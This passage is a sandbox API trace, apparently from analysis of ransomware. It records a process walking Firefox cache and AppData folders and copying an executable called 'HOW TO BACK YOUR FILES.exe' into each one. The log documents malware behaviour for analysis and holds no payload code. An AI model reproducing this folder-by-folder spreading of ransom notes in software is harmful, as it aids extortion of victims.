[0111.021] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d966bc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d966bc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" [0111.022] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" [0111.022] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.022] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.022] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.023] GetLastError () returned 0x0 [0111.023] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb727c690, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb93420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb93420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.023] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" [0111.023] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2" [0111.023] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.024] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.024] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.024] GetLastError () returned 0x0 [0111.025] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.025] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d98cd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d98cd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.025] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" [0111.025] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1" [0111.025] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.025] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.026] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.026] GetLastError () returned 0x0 [0111.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d98cd20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d98cd20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.027] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" [0111.027] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6" [0111.027] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.027] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.028] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.028] GetLastError () returned 0x0 [0111.028] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7d7ec50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bbb9580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bbb9580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.029] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" [0111.029] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2" [0111.029] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.029] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.029] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.030] GetLastError () returned 0x0 [0111.030] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x826bbed0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bbdf6e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bbdf6e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.030] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" [0111.031] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B" [0111.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.031] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.032] GetLastError () returned 0x0 [0111.032] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7680bb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bbdf6e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bbdf6e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.032] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" [0111.032] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0" [0111.032] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.033] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.033] GetLastError () returned 0x0 [0111.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.034] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d9b2e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d9b2e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" [0111.034] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8" [0111.034] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.034] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\a8\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.038] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.038] GetLastError () returned 0x0 [0111.038] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\A8\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81eff750, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bc05840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc05840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.039] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" [0111.040] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98" [0111.040] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.040] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\0\\98\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.041] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.041] GetLastError () returned 0x0 [0111.042] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.042] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\0\\98\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb8c39470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bc2b9a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bc2b9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.044] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help" [0111.045] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help" [0111.045] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.045] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.046] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" 